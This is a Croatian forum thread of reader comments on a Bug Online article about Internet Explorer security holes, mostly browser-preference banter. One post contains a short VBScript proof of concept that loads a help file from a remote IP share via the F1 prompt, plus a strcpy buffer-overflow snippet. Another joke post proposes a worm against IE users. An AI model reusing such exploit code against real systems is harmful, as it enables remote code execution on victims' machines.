Još propusta u Internet Exploreru

poruka: 28
|
čitano: 1.555
|
moderatori: F1-IVO
1
+/- sve poruke
ravni prikaz
starije poruke gore
Ovo je tema za komentiranje sadržaja Bug Onlinea. U nastavku se nalaze komentari na "Još propusta u Internet Exploreru".
2 godine

ništa novo, svaki dan se sve više propusta otkrije. zato se držim podalje od internet explorera

ajmo svi na erepublik ;) <3 BF BC 2
2 godine

to namjerno objavljuju budući da žele više korisnika IE8. Siguran sam da i IE8 ima rupa i rupica kojih su svjesni.

:-)
3 godine

Šta je ovo...otkrije se 60 propusta na dan? :P

3 godine
RE: Još propusta u Internet Exploreru
Ah,kolko propusta još neče naći...
3 godine

Krešimir Brebrić, autor clanka, je napisao:

Također se istiće kako zaštitni mehanizmi u Windows Visti i kasnijim operativnim sustavima znatno ograničavaju mogućnosti zloupotrebe propusta obzirom da i u slučaju uspješnog iskorištavanja napadač ima samo vrlo ograničene u sustavu.

ja stvarno ne znam imaju ili u Bugu lektora ili ne, ali kad sam ja ucio gramatiku, govorilo se "istiČe" a ne "istiĆe" :-? ne razumijem, zar je toliko tesko prekopirati tekst u Word i odvrtiti spell checker koji bi sigurno ovaj propust vidio i ispravio ga.

2 godine
ibazulic kaže...

Krešimir Brebrić, autor clanka, je napisao:

Također se istiće kako zaštitni mehanizmi u Windows Visti i kasnijim operativnim sustavima znatno ograničavaju mogućnosti zloupotrebe propusta obzirom da i u slučaju uspješnog iskorištavanja napadač ima samo vrlo ograničene u sustavu.

ja stvarno ne znam imaju ili u Bugu lektora ili ne, ali kad sam ja ucio gramatiku, govorilo se "istiČe" a ne "istiĆe" :-? ne razumijem, zar je toliko tesko prekopirati tekst u Word i odvrtiti spell checker koji bi sigurno ovaj propust vidio i ispravio ga.

e stvarno si faca ...

:-)
3 godine
ibazulic kaže...

Ajde pokusaj pogoditi koliki je postotak posjetitelja koji su procitali taj clanak, primijetio tu pravopisnu pogresku :)

3 godine

Imam dobru ideju - "fear campain" :)

Neka "hakerska" grupa koja uz to i mrzi Internet Explorer bi trebala napraviti crva/trojanca koji ce ciljano napasti doticni browser, te prikazati poruku tipa:

"Your computer has been hacked because of a security hole in Internet Explorer. Switch to an alternative browser, b*tch!"

I to sve na plavom ekranu smrti - pa da se likovi useru xD

2 godine

Internet Explorer je rupetina kakve nema nigdje.

2 godine
neaktivan

imo je moj buraz pravo IE je rupa kakve nema.........hvala bogu mozzila je kak tak u redu

2 godine
Pored toliko odlicni browsera ljudi jos uvijek koriste IE..
3 godine
x18x05x kaže...
Pored toliko odlicni browsera ljudi jos uvijek koriste IE..

tako je, prijeđite svi na operu  Izlanuo se

2 godine

Internet Explorer je zapravo jedan ogorman propust, otkrivanje nekakvih mini propusta u njemu je kao otkrivanje tople vode.

Plod nepouzdanosti kontracepcije
2 godine
Šime kaže...

Imam dobru ideju - "fear campain" :)

Neka "hakerska" grupa koja uz to i mrzi Internet Explorer bi trebala napraviti crva/trojanca koji ce ciljano napasti doticni browser, te prikazati poruku tipa:

"Your computer has been hacked because of a security hole in Internet Explorer. Switch to an alternative browser, b*tch!"

I to sve na plavom ekranu smrti - pa da se likovi useru xD

kad jednog dana alternativa napokon uspije napravit pošten browser na kojem će sve radit možda i uzmem neš drugo kao primarni browser, do tad je ie moj prvi izbor :)

kod mene normalno radi.....
3 godine
protjeran
cekpi kaže...

kad jednog dana alternativa napokon uspije napravit pošten browser na kojem će sve radit možda i uzmem neš drugo kao primarni browser, do tad je ie moj prvi izbor :)

ovaj...jedine stranice koje ie prikazuje kako treba su stranice koje su optimizirane za ie...

http://www.erepublik.com/en/referrer/GrimyHR
2 godine

zato sam ja prešo na firefox, makar i on dost sve češće ima više rupa, al puno manje neg IE...

Dompa
2 godine
protjeran

Jel to možda ovaj kod:

<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500
//  big = big & "\..\"
//Next

MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>

</html>

Cool

void function(char *str) {char buffer[16];strcpy(buffer,str); } void main() {char large_string[256];int i; for( i = 0; i &amp;amp;lt; 255; i++) large_string[i] = 'A';function(large_string)
2 godine
zoran123456 kaže...

to namjerno objavljuju budući da žele više korisnika IE8. Siguran sam da i IE8 ima rupa i rupica kojih su svjesni.

to sam i ja pomislio,znači istina je

isti dan otkaz i žuti
3 godine
Šime kaže...
ibazulic kaže...

Ajde pokusaj pogoditi koliki je postotak posjetitelja koji su procitali taj clanak, primijetio tu pravopisnu pogresku :)

vjerojatno se isti mjeri u promilima :-)

@zoran123456: ne znam odnosi li se ovo "faca" kao pozitivno ili negativno, ali mene u citanju clanaka stvarno smeta nepoznavanje *osnovne* gramatike. da pricamo o nekakvim znanstvenim clancima, clanak bi bio odbijen zbog takve pogreske. srecom pa novinarstvo nije cijenjeno zanimanje u HR, pa se svaka susa moze sa istim baviti.

2 godine
grimyHR kaže...
cekpi kaže...

ovaj...jedine stranice koje ie prikazuje kako treba su stranice koje su optimizirane za ie...

odnosno sve meni potrebne :)

2 godine
protjeran

velika vecina web designera gleda da im stranice budu optimizirane sa ie i mozillom.

zato je tako visoka upotreba ie i dobar dobar dio kolaca zagrizla je i mozilla

3 godine
sablja kaže...

velika vecina web designera gleda da im stranice budu optimizirane sa ie i mozillom.

zato je tako visoka upotreba ie i dobar dobar dio kolaca zagrizla je i mozilla

LOL

IE ima toliki udio jer je krajem 90ih vodio bitku sa Netscape Navigatorom s kojim je bio nekompatibilan, tj. stranice optimizirane za jedan, se nisu dobro prikazival u drugom. Posto je IE pobijedio, postao je jedini browser, i to sve do negdje 2003.

Dakle, 2000-2004, IE je drzio udio kakav danas drze Windowsi, preko 90%.

S vremenom su se poceli pojavljivati drugi browseri i udio IE od tada lagano pada...

2 godine
cekpi kaže...

Postoje puno bolji alternativni  browseri samo ti to ne vidiš.

2 godine
Asterix kaže...
cekpi kaže...

ukaži mi na njih

jedine zahtjeve koji imam je da

- je podržan sso

- može u potpunosti prikazat microsoft web servise

- može prikazat galeriju na tportalu :)

2 godine
cekpi kaže...
Asterix kaže...
cekpi kaže...

ukaži mi na njih

- je podržan sso

Mozilla Firefox, Google Chrome. Opera navodno ima nekih problema sa tportalom, ali ništa što se ne može srediti.

2 godine
nontryer kaže...
cekpi kaže...
Asterix kaže...
cekpi kaže...

ukaži mi na njih

- je podržan sso

Mozilla Firefox, Google Chrome. Opera navodno ima nekih problema sa tportalom, ali ništa što se ne može srediti.

jesi uopce procital kaj se trazi?

2 godine

Addon za SSO:

https://addons.mozilla.org/en-US/firefox/addon/10717

SSO mi ne treba, ali u komentarima piše da addon radi odlično.

Ako neke stranice i nisu optimizirane za mozillu, postoji addon koji omogućava firefoxu da koristi IE-ov engine za otvaranje stranica ako zatreba

https://addons.mozilla.org/en-US/firefox/addon/1419

Vjerojatno slični dodaci postoje i za Chrome, jer od zadnje verzije dopušta instalaciju dodataka, ali ne bih znao koji jer ga ne koristim.

Poruka je uređivana zadnji put uto 16.3.2010 4:08 (nontryer).
2 godine
tako je! koristio sam firefox al kad se pojavio chrome nisam mogao odoljeti i od tad ga koristim... brz je, stabilan, ne zauzima puno memorije, lijepog sučelja...
www.val.hr
1
Nova poruka
E-mail:
Lozinka:

vrh stranice